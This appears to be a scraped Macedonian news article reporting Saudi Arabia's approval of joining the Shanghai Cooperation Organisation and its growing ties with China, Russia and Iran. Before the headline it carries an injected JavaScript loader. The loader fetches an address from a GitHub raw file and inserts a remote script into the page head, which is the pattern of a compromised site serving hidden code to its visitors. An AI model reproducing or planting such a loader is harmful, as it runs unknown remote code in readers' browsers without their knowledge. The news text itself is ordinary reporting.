;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Саудиска Арабија станува членка на Шангајската организација за соработка, и ги зајакнува односите со Русија и Кина - Антропол
АктуелноИнтернационално

Саудиска Арабија станува членка на Шангајската организација за соработка, и ги зајакнува односите со Русија и Кина

Владата на Саудиска Арабија ја одобри одлуката за приклучување кон Шангајската организација за соработка (ШОС).

Станува збор за продолжување на зајакнувањето на односите меѓу таа заливска монархија и членките на ШОС, пред сè Кина и Русија.

Шангајската организација за соработка е основана во 2001 година од Русија, Кина и земјите од Централна Азија, а потоа и се приклучија Индија и Пакистан.

Иран ги потпиша документите за пристап минатата година, а се очекува оваа година да стане полноправна членка на организацијата.

Членството во ШОС беше тема на средбата меѓу саудискиот престолонаследник Мохамед бин Салман и кинескиот претседател Си Џинпинг за време на неговата посета на Ријад кон крајот на минатата година, пренесува Ројтерс. Статусот на партнер во дијалогот е првиот чекор на патот кон полноправно членство, што е долгорочна цел за Ријад.

Кина неодамна посредуваше за договор за повторно воспоставување дипломатски односи меѓу Саудиска Арабија и Иран, што претставува еден од најзначајните меѓународни договори во последниве години.

Одлуката уследи по најавата на саудиската државна нафтена компанија „Сауди Арамко“ да инвестира неколку милијарди долари во Кина.

Покрај Саудиска Арабија и Иран, се очекува наскоро членка на ШОС да стане и Белорусија.